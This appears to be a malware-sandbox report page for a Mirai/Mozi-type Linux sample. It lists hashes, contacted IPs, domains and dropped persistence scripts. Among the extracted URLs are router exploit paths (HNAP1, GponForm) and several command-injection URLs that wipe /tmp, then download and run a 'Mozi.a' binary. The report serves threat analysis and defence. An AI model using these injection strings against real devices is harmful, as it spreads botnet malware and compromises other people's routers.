KnAY2OIPI3

Status: finished

Submission Time: 2021-05-01 17:50:31 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
402062
API (Web) ID:
706281
Analysis Started:

2021-05-01 17:50:31 +02:00
Analysis Finished:

2021-05-01 18:01:14 +02:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 40/59

Open Full Report

malicious

Score: 20/37

malicious

Score: 20/29

malicious

IPs

IP	Country	Detection
185.8.165.103	Czech Republic
91.39.50.75	Germany
150.94.181.169	Japan
Click to see the 97 hidden entries
115.216.161.117	China
38.66.167.189	United States
196.2.152.33	South Africa
100.58.97.165	United States
27.208.150.177	China
165.147.231.202	South Africa
122.14.26.131	China
217.26.218.59	United Kingdom
105.23.23.99	Mauritius
133.53.157.82	Japan
103.167.29.254	unknown
126.66.70.2	Japan
218.99.163.37	China
179.5.114.184	El Salvador
37.198.64.4	Sweden
62.37.123.164	Spain
32.38.64.238	United States
222.118.224.59	Korea Republic of
124.106.81.28	Philippines
220.131.247.227	Taiwan; Republic of China (ROC)
167.108.60.0	Uruguay
64.227.0.234	United States
171.37.201.166	China
129.39.197.165	United States
216.144.192.30	United States
182.90.150.203	China
181.228.162.132	Argentina
162.165.207.141	United States
20.177.182.208	United States
124.164.21.186	China
170.102.192.11	Sweden
221.136.83.195	China
172.200.33.30	United States
98.125.252.19	United States
191.125.31.198	Chile
69.1.46.186	United States
211.249.221.67	Korea Republic of
42.117.16.157	Viet Nam
56.99.140.32	United States
86.112.104.146	United Kingdom
54.161.176.221	United States
40.108.216.138	United States
72.185.234.219	United States
58.178.78.48	Australia
123.144.168.163	China
192.170.164.35	United States
41.209.27.240	Kenya
193.63.110.24	United Kingdom
185.149.152.118	Lithuania
96.254.228.27	United States
88.128.154.190	Germany
216.155.36.104	United States
218.133.250.221	Japan
171.149.135.6	United States
83.177.255.20	Sweden
195.220.247.126	France
197.81.37.161	South Africa
195.167.58.217	Greece
164.87.137.230	United States
102.198.183.70	unknown
68.55.232.254	United States
38.112.119.34	United States
176.23.157.80	Denmark
121.211.248.199	Australia
217.151.165.60	Iceland
65.171.3.34	United States
73.11.11.167	United States
130.67.62.44	Norway
103.139.115.132	Singapore
123.45.141.9	Korea Republic of
89.141.126.147	Spain
211.35.117.179	Korea Republic of
121.97.146.176	Philippines
218.85.205.133	China
49.40.181.238	India
216.26.159.203	United States
1.151.13.11	Australia
29.11.239.185	United States
19.252.51.218	United States
77.94.17.59	Kazakhstan
38.198.214.3	United States
193.115.92.108	Australia
53.220.117.17	Germany
222.191.119.202	China
160.173.189.54	Morocco
59.92.7.51	India
84.203.232.63	Ireland
101.132.239.79	China
135.91.62.232	United States
74.26.22.165	United States
126.182.147.115	Japan
65.57.76.79	United States
160.20.53.101	Hong Kong
128.109.48.130	United States
124.26.145.221	Japan
119.101.173.5	China
130.196.33.127	United States

Domains

Name	IP	Detection
dht.transmissionbt.com	212.129.33.59
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://52.58.36.52:80/HNAP1/
http://92.122.164.134:80/HNAP1/
Click to see the 46 hidden entries
http://114.158.233.160:80/HNAP1/
http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://38.35.98.151:80/HNAP1/
http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://149.47.68.142:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://164.132.44.102:80/HNAP1/
http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://173.222.98.151:80/HNAP1/
http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://199.204.251.131:80/HNAP1/
http://%s:%d/bin.sh
http://171.247.8.159:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://155.230.225.129:80/HNAP1/
http://134.84.133.102:80/HNAP1/
http://23.78.24.125:80/HNAP1/
http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://schemas.xmlsoap.org/soap/envelope//
http://HTTP/1.1
http://www.alsa-project.org.
http://purenetworks.com/HNAP1/
http://www.pastebin.ca
http://%s:%d/Mozi.a;chmod
http://127.0.0.1:7574/UD/act?1
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://ipinfo.io/ip
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://%s:%d/Mozi.m
http://127.0.0.1sendcmd
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://%s:%d/Mozi.m;
http://www.pastebin.ca/upload.php
http://www.alsa-project.org/cardinfo-db/
http://schemas.xmlsoap.org/soap/encoding/
http://pastebin.ca)
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

KnAY2OIPI3

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

KnAY2OIPI3 Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

KnAY2OIPI3